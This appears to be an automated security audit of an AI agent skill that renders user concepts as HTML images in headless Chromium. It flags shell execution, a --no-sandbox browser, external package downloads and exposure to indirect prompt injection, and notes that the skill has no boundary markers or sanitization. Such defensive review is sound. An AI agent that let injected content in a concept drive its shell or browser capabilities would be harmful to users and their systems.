Skills
skills/mathews-tom/praxis-skills/concept-to-image/Gen Agent Trust Hub

concept-to-image

Pass

Audited by Gen Agent Trust Hub on Apr 16, 2026

Risk Level: SAFECOMMAND_EXECUTIONEXTERNAL_DOWNLOADSPROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill core workflow relies on executing a local Python script scripts/render_to_image.py via shell command to perform image rendering. The script launches a headless Chromium browser using the --no-sandbox flag, which reduces security isolation in the execution environment.
  • [EXTERNAL_DOWNLOADS]: The skill's documentation and error handling instructions direct the user or agent to download and install external software, specifically the playwright package and the chromium browser binary from public registries.
  • [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection. It takes untrusted user input (the "concept") and uses it to generate HTML content which is then rendered by a headless browser.
  • Ingestion points: User concept prompts processed in SKILL.md (Step 1).
  • Boundary markers: None present; the AI is instructed to design HTML directly from user descriptions.
  • Capability inventory: Execution of scripts/render_to_image.py (shell access) and browser rendering via Playwright (network and file system access within the browser context).
  • Sanitization: No sanitization or validation of the user-provided concept is mentioned before it is used to generate executable HTML/SVG code.
Audit Metadata
Risk Level
SAFE
Analyzed
Apr 16, 2026, 11:33 AM